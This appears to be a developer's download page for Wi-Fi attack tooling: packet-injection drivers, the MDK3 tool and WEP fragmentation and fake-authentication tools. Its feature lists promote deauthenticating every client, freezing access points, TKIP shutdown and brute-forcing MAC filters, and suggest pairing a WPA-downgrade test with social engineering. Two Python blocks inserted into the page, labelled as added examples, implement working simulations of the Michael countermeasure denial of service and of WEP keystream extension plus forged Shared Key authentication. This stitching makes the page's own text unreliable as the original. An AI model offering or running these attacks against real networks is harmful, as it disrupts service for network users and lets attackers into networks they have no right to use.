Enhanced Injection driver for Intel ipw3945
External project by JMF, only hosted here
This is based on a driver made for testing purposes called ipwraw. It allows
raw packet Tx/Rx with the Intel PRO/Wireless 3945ABG adapter. It is a raw-mode
only driver and can't be used for normal connections to the internet.
ipwraw doesn't have wireless extensions, so this modification adds some to
make it easier to work with programs like aircrack-ng, kismet, mdk, ...
New in ipwraw-ng 2.3.4:
- Added compatibility fixes for recent kernels (2.6.23 and newer)
- Fixed bug when setting 5.5 Mb/s rate with iwconfig
- Fixed bugs (I hope) in Makefile - it would report that old firmware versions
  were adequate and also had some cosmetic glitches
- Added set TxPower Wireless Extension. Now TxPower can be set using
  iwconfig INTERFACE txpower TXPOWER
  (INTERFACE is normally wifi0 or eth0; TXPOWER is the value you want to set,
  min=-12 and max=16)
This version includes some fixes ported from the ipw3945 driver. It should be
more stable now...
Default speed was left at 54 MBit, you may want to lower it to 1 MBit before
injection with iwconfig wifi0 rate 1M
You will have that configured automatically if you use airmon-ng from the
aircrack-ng suite (changeset 847 or greater)
More information can be found in the included README.ipwraw-ng file.
Please contact JMF directly for questions regarding his driver: tolas_feup@hotmail.com
ipwraw-ng-2.3.4-04022008.tar.bz2
Older Versions:
ipwraw-ng-2.0.0-10072007.tar.bz2
ipwraw-ng-1.0.0-21062007.tar.bz2
RaLink RT73 USB Enhanced Driver
- Support for Fragmentation Attack
- Interface is called rausb0 instead of wlan0 to prevent some tools from
  incorrectly detecting it as a wlanng or hostap driver
- Injection speed can be selected with the iwconfig <interface> rate command.
  The default speed is 54 MBit. You may want to lower it to 1 MBit before
  injection with iwconfig rausb0 rate 1M
IMPORTANT!
Version 3.0.0 is a new fork from the former serialmonkey CVS. It has fixes for
2.6.24 and 2.6.25 and does not need setting a MAC Address before bringing the
interface up. This version includes all the enhancements of the 2.0 series of
this driver. If you unplug the card while it's still in use, it may crash your
system. So close all applications accessing it, bring the interface down and
then remove the device.
You may have waited for this:
Version 3.0.1 has an updated base version from serialmonkey CVS. It is patched
with all the features of 3.0.0 and it has been successfully tested with the
2.6.26 vanilla kernel.
Version 3.0.2 provides kernel version 2.6.27 compatibility.
NOTE: You may also try the mac80211 drivers included in 2.6.27 or newer since
these drivers are pretty nice too ;)
Version 3.0.3 provides kernel version 2.6.29 compatibility. It uses
default kernel memory allocation for devices' private data area. This
may fail on 64bit platforms (according to RaLink). In previous versions
the driver allocated its own memory and hacked it into the netdev
structure. This hack failed in 2.6.29 and has been removed. However,
the new mode works for me quite well. Please report if any problems
occur.
rt73-k2wrlz-3.0.3.tar.bz2
Older versions:
rt73-k2wrlz-3.0.2.tar.bz2
rt73-k2wrlz-3.0.1.tar.bz2
rt73-k2wrlz-3.0.0.tar.bz2
rt73-k2wrlz-2.0.1.tar.bz2
rt73-k2wrlz-2.0.0.tar.bz2
rt73-k2wrlz-1.1.0.tar.bz2
rt73-k2wrlz-1.0.0.tar.bz2
RaLink RT2570 USB Enhanced Driver
- Prism header can be toggled via iwpriv, no automatic changes which screwed
  up packet captures!
- MAC changing supported
- Support for Fragmentation Attack
Fragmentation support is now considered stable. For further details on the
fragmentation attack see the paper by Andrea Bittau: http://toorcon.org/2005/slides/abittau/
Version 1.5.0 has some important fixes for kernel version 2.6.19 and above.
The serialmonkey CVS repository updated its driver from a new RaLink
legacy one. Version 1.6.0 is the modification of this driver with
fragmentation support, MAC changing and prism headers enabled by
default. This driver seems to fix some threading, some SMP and some
endianness issues. So it should be more stable than previous releases.
Version 1.6.1 works for 2.6.22 kernels and comes with some more
stability improvements.
Version 1.6.2 comes with a new base version from serialmonkey CVS, all the
patches from the previous version and support for the 2.6.26 kernel.
Version 1.6.3 adds kernel 2.6.27 compatibility. NOTE: You may also try the mac80211
drivers included in 2.6.27 since these drivers are pretty nice too ;)
Version 1.6.4 adds compatibility with 2.6.29.
rt2570-k2wrlz-1.6.4.tar.bz2
Older Versions:
rt2570-k2wrlz-1.6.3.tar.bz2
rt2570-k2wrlz-1.6.2.tar.bz2
rt2570-k2wrlz-1.6.1.tar.bz2
rt2570-k2wrlz-1.6.0.tar.bz2
rt2570-k2wrlz-1.5.1.tar.bz2
rt2570-k2wrlz-1.5.0.tar.bz2
rt2570-k2wrlz-1.4.9.tar.bz2
rt2570-k2wrlz-1.4.0.tar.bz2
rt2570-k2wrlz-1.3.0.tar.bz2
rt2570-k2wrlz-1.2.0.tar.bz2
MDK3
The new MDK3 uses the osdep injection library from the www.aircrack-ng.org
project. The Linux-dependent includes have been removed; mdk3 compiles and
runs on FreeBSD and even Windows (Cygwin). For Windows you need special
drivers, a possibly illegal DLL file and the Cygwin environment. Please see
the aircrack-ng website for details about Packet Injection in Windows.
MDK3 works on the new mac80211 stack.
If you are a Linux user, just make, make install and have fun.
If you are a FreeBSD user, do the same, and report back to me if it works
correctly there.
If you are a Windows user, good luck, but expect no support from me.
MDK3 is licensed under GPLv2.
Features:
- Bruteforce MAC Filters
- Bruteforce hidden SSIDs (some small SSID wordlists included)
- Probe networks to check if they can hear you
- Intelligent Authentication-DoS to freeze APs (with success checks)
- FakeAP - Beacon Flooding with channel hopping (can crash NetStumbler and
  some buggy drivers)
- Disconnect everything (aka AMOK-MODE) with Deauthentication and
  Disassociation packets
- WPA TKIP Denial-of-Service
- WDS Confusion - Shuts down large scale multi-AP installations
Changelog:
MDK3 version 6
- Amok Mode now works on Ad-Hoc and MANET networks (WARNING: Clients may not
  reconnect automatically, so they may stay disconnected after the attack
  has stopped!)
- Removed duplicate WPA downgrade in Deauth Mode (sorry for the confusion)
- SSID Bruteforce Mode understands 0 and 1 byte SSIDs as hidden now, and
  tries all lengths
- GCC 4.4 support, all warnings and extra warnings fixed
- Whitelists and Blacklists in Amok Mode are re-read periodically every 3
  seconds. You can use this to dynamically allow or block hosts with scripts.
- A lot of small bugfixes
MDK3 version 5
- Enhanced MAC-Filter Bruteforce Mode
- Another WDS/WIDS/WIPS Confusion Test
- Amok Mode supports QoS packets
- Michael Countermeasure Exploit (also known as TKIP QoS Exploit)
  Shuts down APs using TKIP encryption and the QoS Extension with 1 sniffed
  and 2 injected QoS Data Packets
- WPA-Downgrade Test - deauthenticates Stations and APs sending WPA encrypted
  packets. With this test you can check if the sysadmin will try WEP or even
  disable encryption.
  mdk3 will let WEP and unencrypted clients work, so if the sysadmin simply
  thinks "WPA is broken" he sure isn't the right one for this job.
  (this can/should be combined with social engineering)
MDK3 version 4
- Added high-speed MAC-Filter Bruteforce Mode (experimental)
  Please test this on your APs and report back for optimizing and bugfixing,
  thanks!
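What the "Michael Countermeasure Exploit" entry above relies on, shown as an added example in Python (this is not mdk3 code and is not taken from the page): a toy 802.11i TKIP receiver that keeps one TSC replay counter per QoS TID and counts MIC failures the way the countermeasures do. It assumes the receiver feeds the QoS priority into the MIC input, as 802.11i specifies for Michael (DA | SA | Priority | 0 0 0 | MSDU); the MIC itself is an HMAC stand-in for Michael, and the key, MAC addresses, TSC values and timestamps are constructed for the example.

```python
"""Why one sniffed and two replayed QoS data frames can freeze a TKIP AP.
Added example, not mdk3 code. HMAC stands in for Michael; only Michael's
*inputs* (which include the QoS priority) matter for the effect shown."""
import hashlib
import hmac

MIC_FAILURE_WINDOW = 60.0   # 802.11i: a 2nd MIC failure within 60 s ...
SHUTDOWN_SECONDS = 60.0     # ... triggers countermeasures for 60 s


def mic(mic_key: bytes, da: bytes, sa: bytes, priority: int, msdu: bytes) -> bytes:
    """MIC over DA | SA | Priority | 0 0 0 | MSDU (Michael's input layout)."""
    data = da + sa + bytes([priority, 0, 0, 0]) + msdu
    return hmac.new(mic_key, data, hashlib.sha256).digest()[:8]


class TkipReceiver:
    """Toy AP-side TKIP receive path: replay check, MIC check, countermeasures."""

    def __init__(self, mic_key: bytes):
        self.mic_key = mic_key
        self.replay_ctr = {}      # TSC replay counter kept PER TID when QoS is in use
        self.failures = []        # timestamps of recent MIC failures
        self.down_until = 0.0     # countermeasures active until this time

    def receive(self, now: float, frame: dict) -> str:
        if now < self.down_until:
            return "dropped: countermeasures active"
        tid, tsc = frame["tid"], frame["tsc"]
        if tsc <= self.replay_ctr.get(tid, -1):
            return "dropped: replay"
        # Decryption and ICV check are omitted: an unmodified replay passes both,
        # since the TSC in the frame still selects the original per-packet key.
        expected = mic(self.mic_key, frame["da"], frame["sa"], tid, frame["msdu"])
        if expected != frame["mic"]:
            recent = [t for t in self.failures if now - t < MIC_FAILURE_WINDOW]
            self.failures = recent + [now]
            if len(self.failures) >= 2:
                self.down_until = now + SHUTDOWN_SECONDS
                self.failures.clear()
                return "MIC failure: countermeasures, all stations deauthenticated"
            return "MIC failure: reported to AP"
        self.replay_ctr[tid] = tsc
        return "accepted"


def make_frame(mic_key: bytes, da: bytes, sa: bytes, tid: int, tsc: int, msdu: bytes) -> dict:
    """A legitimate QoS data frame as the station would build it."""
    return {"da": da, "sa": sa, "tid": tid, "tsc": tsc, "msdu": msdu,
            "mic": mic(mic_key, da, sa, tid, msdu)}


def qos_replay_attack(rx: TkipReceiver, sniffed: dict, start: float) -> list:
    """Resend the SAME sniffed frame on two other TIDs. Their replay counters are
    lower, ciphertext and ICV are untouched, but the MIC was computed for the
    original priority, so the MIC check is the one that fails."""
    results = []
    for i, tid in enumerate((1, 2)):
        replay = dict(sniffed, tid=tid)        # only the QoS TID field is changed
        results.append(rx.receive(start + i, replay))
    return results


def demo() -> dict:
    key = b"constructed-mic-key"                              # constructed
    rx = TkipReceiver(key)
    sta = bytes.fromhex("0011223344aa")                       # constructed MACs
    ap = bytes.fromhex("0011223344bb")
    legit = make_frame(key, ap, sta, tid=0, tsc=1000, msdu=b"hello")
    first = rx.receive(0.0, legit)                            # the one sniffed frame
    attack = qos_replay_attack(rx, legit, start=1.0)          # the two injected frames
    later = rx.receive(5.0, make_frame(key, ap, sta, 0, 1001, b"next"))
    return {"first": first, "attack": attack, "later": later}
```

An unmodified replay on another TID passes the replay check and the ICV, so the MIC is the only check left to fail, and the second failure inside the 60-second window trips the countermeasures: every station is deauthenticated and the AP refuses TKIP traffic for a minute, which is why legitimate traffic in `demo()` is dropped afterwards. A receiver that does not feed the TID into its MIC would simply accept such a replay, so the effect depends on QoS being enabled.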
mdk3-v6.tar.bz2
Old versions:
mdk3-v5.tar.bz2
mdk3-v4.tar.bz2
mdk3-v3.tar.bz2
mdk3-v2.tar.bz2
mdk3-v1.tar.bz2
Ancient mdk2 versions:
mdk2-v36.tar.bz2
mdk2-v35.tar.bz2
mdk2-v34.tar.bz2
Prism2_usb Injection driver
This is the first Prism2 USB driver that was able to inject packets. I made
this before Devine had his own one, but I never released it to the public.
Unlike his driver, this one seems to be very stable (I was able to crack a
whole lot of WEPs with aireplay). It shares the same issue with Devine's
driver: it doesn't inject on kernels newer than 2.6.11. I can't give any
support or help for this since I gave my Prism away. Sorry.
linux-wlan-ng-0.2.3-k2wrlz-usbrawsend.tar.bz2
linux-wlan-ng-0.2.2-k2wrlz-usbrawsend.tar.bz2
Fake Shared Key Authentication
This is the world's first fully functional code to enable fake authentication
on networks using Shared Key Authentication. You do NOT need to know the key
to authenticate; all you need is a keystream that has been obtained with
aireplay-ng's chopchop attack. Hirte, another developer from the aircrack-ng
community, successfully included this code into the aircrack-ng suite.
Fixed in Version 0.2:
- Show error when network does not use Shared Key Authentication
- Get Capability Field from Beacon Frame. (Using the standard capabilities
  failed for some APs)
ska-0.2.tar.bz2
ska-0.1.tar.bz2
Fragmentation Attack
And another world premiere from me: the first implementation of the
Fragmentation Attack on Linux. This attack needs a special driver and card
that are able to handle IEEE 802.11 fragmentation correctly; your driver may
not work or may need to be updated or modified. The output of this tool is a
file in the aircrack-ng keystream format (.xor). The output can be used in
the same way as the output of the chopchop attack in aireplay-ng. With that
keystream you can build an ARP packet (arpforge-ng or packetforge-ng). This
packet can then be injected into the target wifi system, generating answers
and/or forwarded packets that increase the IV count. For an example attack,
see the README in the tarball.
afrag has already been integrated into aireplay-ng; the best idea is to get
the aircrack-ng SVN version for the newest fragmentation attack code.
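The two techniques described above, keystream extension by fragmentation (afrag) and fake Shared Key Authentication with a keystream instead of the key (ska), simulated end to end in Python. This is an added example written for this page, not code from afrag, ska or aircrack-ng; the access point, its 40-bit key, the IV counter, the sniffed ARP frame and the 128-byte challenge are all constructed here, and the attacker functions only ever see what would be on the air. The real attacks run against a live AP through an injection-capable driver, not a Python object.

```python
"""WEP fragmentation attack (Bittau) followed by fake Shared Key Authentication.
Added example, not code from afrag, ska or aircrack-ng. The attacker side never
touches the WEP key; it only ever holds keystreams, each bound to one IV."""
import struct
import zlib

SNAP_ARP = bytes.fromhex("aaaa030000000806")  # LLC/SNAP header of every ARP frame: 8 known bytes
MAX_FRAGMENTS = 16                            # the 802.11 fragment number field is 4 bits


def rc4(key: bytes, n: int) -> bytes:
    """Plain RC4 keystream; used only to model the AP, never by the attacker."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(data))


class WepAP:
    """Toy AP: per-packet RC4 key is IV || WEP key, and IV reuse is never checked."""

    def __init__(self, wep_key: bytes):
        self._key = wep_key          # secret: no attacker function below reads it
        self._iv_ctr = 0x100000      # constructed: deterministic fresh IVs for relayed frames

    def _keystream(self, iv: bytes, n: int) -> bytes:
        return rc4(iv + self._key, n)

    def encrypt(self, plaintext: bytes) -> tuple:
        self._iv_ctr += 1
        iv = struct.pack("<I", self._iv_ctr)[:3]
        return iv, xor(plaintext + icv(plaintext), self._keystream(iv, len(plaintext) + 4))

    def decrypt(self, iv: bytes, ciphertext: bytes) -> bytes:
        plain = xor(ciphertext, self._keystream(iv, len(ciphertext)))
        body, tag = plain[:-4], plain[-4:]
        if icv(body) != tag:
            raise ValueError("bad ICV: frame silently dropped")
        return body

    def relay_fragments(self, frags: list) -> tuple:
        """Each fragment has its own IV and ICV. The AP decrypts them, reassembles
        the MSDU and relays it as ONE frame under a fresh IV: the attacker now
        knows the full plaintext of a frame encrypted with a different IV."""
        assert 1 <= len(frags) <= MAX_FRAGMENTS
        return self.encrypt(b"".join(self.decrypt(iv, ct) for iv, ct in frags))


def keystream_from_arp(iv: bytes, ciphertext: bytes) -> tuple:
    """Sniffed ARP frame -> 8 keystream bytes for its IV (known SNAP header)."""
    return iv, xor(ciphertext[:8], SNAP_ARP)


def extend_keystream(ap: WepAP, iv: bytes, ks: bytes) -> tuple:
    """One fragmentation round: k keystream bytes let each fragment carry k-4 chosen
    bytes plus ICV; 16 fragments make a 16*(k-4)-byte MSDU that the AP relays, and
    known plaintext XOR relayed ciphertext yields 16*(k-4)+4 keystream bytes for the
    AP's new IV. Two rounds: 8 -> 68 -> 1028 bytes."""
    chunk = len(ks) - 4
    plain = bytes((i * 7 + 3) & 0xFF for i in range(MAX_FRAGMENTS * chunk))  # any filler
    frags = []
    for i in range(MAX_FRAGMENTS):
        piece = plain[i * chunk:(i + 1) * chunk]
        frags.append((iv, xor(piece + icv(piece), ks)))   # same IV for every fragment
    new_iv, relayed = ap.relay_fragments(frags)
    return new_iv, xor(plain + icv(plain), relayed)


def forge_ska_response(challenge: bytes, iv: bytes, ks: bytes) -> tuple:
    """Frame 3 of Shared Key authentication: the challenge, WEP-encrypted.
    Body = algorithm 1 | sequence 3 | status 0 | IE(id 16, len 128, challenge) =
    136 bytes, plus 4 ICV: any keystream of >= 140 bytes (reusing its IV) suffices."""
    body = struct.pack("<HHH", 1, 3, 0) + bytes([16, 128]) + challenge
    if len(ks) < len(body) + 4:
        raise ValueError(f"need {len(body) + 4} keystream bytes, have {len(ks)}")
    return iv, xor(body + icv(body), ks)


def ap_checks_ska(ap: WepAP, challenge: bytes, iv: bytes, ciphertext: bytes) -> bool:
    body = ap.decrypt(iv, ciphertext)
    alg, seq, status = struct.unpack("<HHH", body[:6])
    return (alg, seq, status) == (1, 3, 0) and body[6:8] == bytes([16, 128]) and body[8:] == challenge


def demo() -> dict:
    ap = WepAP(bytes.fromhex("0102030405"))                 # constructed 40-bit key
    iv, ks = keystream_from_arp(*ap.encrypt(SNAP_ARP + bytes(28)))  # sniffed ARP
    lengths = [len(ks)]
    for _ in range(2):                                      # 8 -> 68 -> 1028 bytes
        iv, ks = extend_keystream(ap, iv, ks)
        lengths.append(len(ks))
    challenge = bytes(range(128))                           # constructed AP challenge
    ok = ap_checks_ska(ap, challenge, *forge_ska_response(challenge, iv, ks))
    return {"keystream_lengths": lengths, "ska_accepted": ok}
```

Two points the prose above leaves implicit: a recovered keystream is only valid for the IV it was recovered under, so every forged frame (fragments and the authentication response alike) reuses that IV, which WEP permits; and the reassembled frame only comes back if the AP relays it, which is why afrag sends traffic the AP will forward rather than traffic addressed to the attacker's own station.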
afrag-0.1.tar.bz2
Contact and Fanclub
If you want to send some funny stuff,
or if you want to join the "official" ASPj Fanclub,
or if you just have some useful patch for any of my software,
or if you used my code in any other project,
I would like to get some mail
>> pedro.larbig@carhs.de <<
Fanclub:
I made up a little list of the people who are in my fanclub. They just went
crazy due to exaggerated happiness after using my drivers and/or mdk3:
Fan List
THANK YOU VERY MUCH FOR THIS AWESOME "FEEDBACK"!